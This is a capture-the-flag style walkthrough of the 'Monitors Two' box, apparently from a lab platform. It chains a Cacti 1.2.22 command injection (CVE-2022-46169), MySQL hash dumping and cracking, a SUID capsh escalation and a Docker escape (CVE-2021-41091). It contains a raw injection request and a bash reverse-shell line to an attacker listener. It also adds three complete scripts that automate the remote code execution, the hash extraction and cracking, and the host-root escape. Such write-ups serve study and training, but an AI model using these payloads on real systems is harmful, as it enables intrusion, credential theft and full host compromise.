Monitors Two involved exploiting Cacti 1.2.22, which was vulnerable to unauthenticated remote code execution (CVE-2022-46169). That returns a shell as www-data inside a Docker container; privileges are escalated to root in the container through a SUID capsh, and root on the host is obtained by abusing CVE-2021-41091, a flaw in Docker Engine that left the data directory (and with it the containers' overlay filesystems) traversable by unprivileged host users, so a SUID binary planted inside a container can be executed from the host.
NMAP
Nmap scan report for 10.10.11.211
Host is up (0.10s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)
| 256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_ 256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Login to Cacti
|_http-favicon: Unknown favicon MD5: 4F12CCCD3C42A4A478F067337FE92794
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
PORT 80 (HTTP)
Trying the default creds for Cacti, admin:admin and admin:cactipw, didn't work.
Searching for vulnerabilities in Cacti 1.2.22 turns up an unauthenticated RCE, CVE-2022-46169: remote_agent.php trusts the X-Forwarded-For header when it checks whether the client is an allowed poller, and the poller_id parameter is spliced unsanitised into a command line.
Foothold
We can confirm it with a single GET request whose injected command calls back to a web server we control. X-Forwarded-For: 127.0.0.1 bypasses the poller IP check and the backticks in poller_id are the injection; a hit on our web server proves the command ran:
GET /remote_agent.php?action=polldata&local_data_ids[0]=6&host_id=1&poller_id=`curl+10.10.14.142` HTTP/1.1
Host: 10.10.11.211
X-Forwarded-For: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Cacti=b7c2b58f33ea788f827a4d4bbe435deb; CactiDateTime=Thu May 04 2023 20:36:02 GMT+0500; CactiTimeZone=300
Upgrade-Insecure-Requests: 1
We can get a reverse shell by sending this bash payload (URL-encoded) in the same poller_id position:
/bin/bash -c "bash -i >& /dev/tcp/10.10.14.142/2222 0>&1"
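The same two requests as a script, an added example that is not part of the original write-up. It percent-encodes the injected command itself (so the backticks, spaces and redirections survive the query string), sends the callback check and then the reverse shell, and bounds the wait because the reverse-shell request never returns. The target, listener address and port, and the local_data_ids[0]=6 / host_id=1 pair are the values from this box; on another instance those two ids may need to be varied.

```shell
#!/bin/sh
# CVE-2022-46169 (Cacti <= 1.2.22) helper. Added example, not the page's code.
# Bypass: X-Forwarded-For: 127.0.0.1 satisfies the poller IP check.
# Injection: poller_id is spliced into a shell command line, so `cmd` runs
# via command substitution.
# Assumptions: target/lhost/lport below are placeholders; local_data_ids[0]=6
# and host_id=1 are the ids that fired on this box.

# Percent-encode every byte except RFC 3986 unreserved characters [A-Za-z0-9._~-].
urlencode() {
  printf '%s' "$1" | od -An -tx1 -v | tr -s ' ' '\n' | sed '/^$/d' |
  while read -r hex; do
    case "$hex" in
      3[0-9]|4[1-9a-f]|5[0-9a]|6[1-9a-f]|7[0-9a]|2d|2e|5f|7e)
        printf "\\$(printf '%03o' "0x$hex")" ;;   # unreserved: emit the byte
      *) printf '%%%s' "$hex" ;;                   # everything else: %XX
    esac
  done
}

# $1 base url, $2 command, $3 local_data_id (default 6), $4 host_id (default 1).
# Prints the exploit URL; the command is wrapped in backticks and encoded.
cacti_rce_url() {
  payload="\`$2\`"
  printf '%s/remote_agent.php?action=polldata&local_data_ids[0]=%s&host_id=%s&poller_id=%s' \
    "$1" "${3:-6}" "${4:-1}" "$(urlencode "$payload")"
}

# $1 base url, $2 command. -g disables curl's [] globbing so local_data_ids[0]
# is sent literally; -m bounds the wait, since a reverse shell keeps the
# request open for as long as the shell lives.
cacti_rce() {
  curl -s -g -m 10 -H 'X-Forwarded-For: 127.0.0.1' \
    "$(cacti_rce_url "$1" "$2" "${3:-}" "${4:-}")"
}

main() {
  target='http://10.10.11.211'          # box address from the scan
  lhost='10.10.14.142'; lport='2222'    # attacker listener (placeholders)
  # 1. Callback check, as on the page: a hit on our listener proves execution.
  cacti_rce "$target" "curl $lhost"
  # 2. Reverse shell. The substitution runs under the system /bin/sh, so the
  #    payload re-execs bash: >& and /dev/tcp are bash features, not POSIX sh.
  cacti_rce "$target" "/bin/bash -c \"bash -i >& /dev/tcp/$lhost/$lport 0>&1\"" || true
}

# Only fires when asked explicitly:  RUN_EXPLOIT=1 sh cacti_rce.sh
if [ "${RUN_EXPLOIT:-0}" = 1 ]; then main; fi
```

Start a listener first (for example nc -lvnp 2222), then run the script with RUN_EXPLOIT=1. The deliberate /bin/bash -c wrapper is the reason the page's payload looks the way it does: the injected substitution is executed by /bin/sh, which on Ubuntu is dash and has neither >& nor /dev/tcp.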
Checking the hostname (a random container ID) and the presence of /.dockerenv shows that we are in a Docker container.
Privilege Escalation (marcus)
Reading entrypoint.sh in the container reveals the MySQL credentials for the db host, which are root:root.
From here, query the users in the user_auth table:
mysql --host=db --user=root --password=root -e "use cacti;show tables; select * from user_auth;"
This yields two password hashes. Cracking them, marcus's hash falls to a wordlist attack, and that password lets us log in as marcus over SSH (port 22 from the scan), which puts us on the host rather than in the container.
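A small helper for this step, added here and not part of the original write-up: it reads the tab-separated output of the mysql query above, locates the username and password columns from the header row (so it works with select * as well as with a narrower select), and writes user:hash lines that hashcat can take directly. It assumes the db host and root:root credentials found in entrypoint.sh, that Cacti 1.2 stores bcrypt ($2y$...) hashes (hashcat mode 3200), and a rockyou wordlist path; the sample rows in the test are constructed, not real hashes.

```shell
#!/bin/sh
# Pull Cacti user hashes out of user_auth and hand them to hashcat.
# Added example, not the page's code. Assumptions: db host/creds from
# entrypoint.sh (db, root:root); Cacti 1.2 bcrypt hashes (hashcat -m 3200);
# wordlist at /usr/share/wordlists/rockyou.txt.

# Read `mysql -e` batch output (tab-separated, header first) on stdin and
# print user:hash lines. Column positions come from the header row, so the
# order of the columns in the query does not matter; users with an empty
# password field (disabled / LDAP-only accounts) are skipped.
user_auth_hashes() {
  awk -F'\t' '
    NR == 1 { for (i = 1; i <= NF; i++) col[$i] = i; next }
    col["username"] && col["password"] && $(col["password"]) != "" {
      print $(col["username"]) ":" $(col["password"])
    }'
}

# Dump the hashes to $1 (default cacti_hashes.txt) and crack them.
dump_and_crack() {
  hashfile="${1:-cacti_hashes.txt}"
  mysql --host=db --user=root --password=root -e \
    'SELECT username, password FROM cacti.user_auth' | user_auth_hashes > "$hashfile"
  # -m 3200 = bcrypt; --username tells hashcat to ignore the "user:" prefix.
  hashcat -m 3200 --username "$hashfile" /usr/share/wordlists/rockyou.txt
  hashcat -m 3200 --username --show "$hashfile"
}
```

Run dump_and_crack from the www-data shell if hashcat is available there, or copy the hash file out and crack it locally; bcrypt is slow, so a wordlist attack rather than a mask is the realistic choice.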
The mail in /var/mail/marcus mentions three CVEs, of which CVE-2021-41091 stands out because the Docker version on this machine is 20.10.5.
There is a good article on how to abuse this; the short version is that CVE-2021-41091 left the Docker data directory and the overlay2 merged directories under it traversable by unprivileged host users, and the container root filesystems there are not mounted nosuid. So if we can get bash (or any binary that spawns bash) into the container's filesystem as a SUID-root file, an unprivileged user on the host can walk into /var/lib/docker/overlay2/<id>/merged/ and execute it, which grants root on the host.

Since we are not root on the actual host, we can't just docker exec into the container and make bash SUID. Running linpeas inside the container, however, shows that capsh has the SUID bit set, which means we can spawn a shell as root with capsh --gid=0 --uid=0 --. From that root shell, copy bash to /tmp and set the SUID bit on the copy. Then, as marcus on the host, run findmnt to find the Docker container's filesystem (the overlay merged directory) and execute the planted bash from there with -p, since without -p bash drops the effective uid back to the caller's.
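The whole chain as a script, an added example that is not from the original write-up. The container-side function plants the SUID bash through capsh; the host-side functions parse findmnt output for overlay merged directories, pick the one that actually contains a SUID binary at the planted path (several containers may be running, and only ours has it), and exec it with -p. The planted path /tmp/bash and the findmnt columns used are assumptions; the mount listing in the test is constructed.

```shell
#!/bin/sh
# CVE-2021-41091 chain for this box. Added example, not the page's code.
# Container side (as www-data): capsh is SUID root, so it hands us uid 0 and
# we plant a SUID bash inside the container's filesystem.
# Host side (as marcus): /var/lib/docker/overlay2/<id>/merged is traversable
# by unprivileged users (the CVE), so the planted binary is reachable and
# keeps its SUID bit when run from the host.
# Assumption: the planted copy lives at /tmp/bash inside the container.

# --- run inside the container ---
container_plant_suid_bash() {
  # capsh switches to the requested ids (here uid/gid 0) before exec'ing.
  capsh --gid=0 --uid=0 -- -c 'cp /bin/bash /tmp/bash && chmod u+s /tmp/bash'
}

# --- run on the host ---
# Read `findmnt -n -o FSTYPE,TARGET` output on stdin; print overlay mount points.
overlay_merged_dirs() {
  awk '$1 == "overlay" { print $2 }'
}

# Read merged dirs on stdin; print the first one holding a SUID file at $1
# (default /tmp/bash). Returns 1 if none does.
find_planted_suid() {
  rel="${1:-/tmp/bash}"
  while read -r dir; do
    if [ -u "$dir$rel" ]; then
      printf '%s\n' "$dir$rel"
      return 0
    fi
  done
  return 1
}

escape_to_host_root() {
  bin="$(findmnt -n -o FSTYPE,TARGET | overlay_merged_dirs | find_planted_suid /tmp/bash)" || {
    echo 'no SUID bash found in any overlay merged dir' >&2
    return 1
  }
  # -p keeps the effective uid; without it bash drops back to the caller's uid.
  exec "$bin" -p
}
```

Call container_plant_suid_bash from the www-data shell, then escape_to_host_root from marcus's SSH session; euid=0 in the resulting prompt confirms the escape.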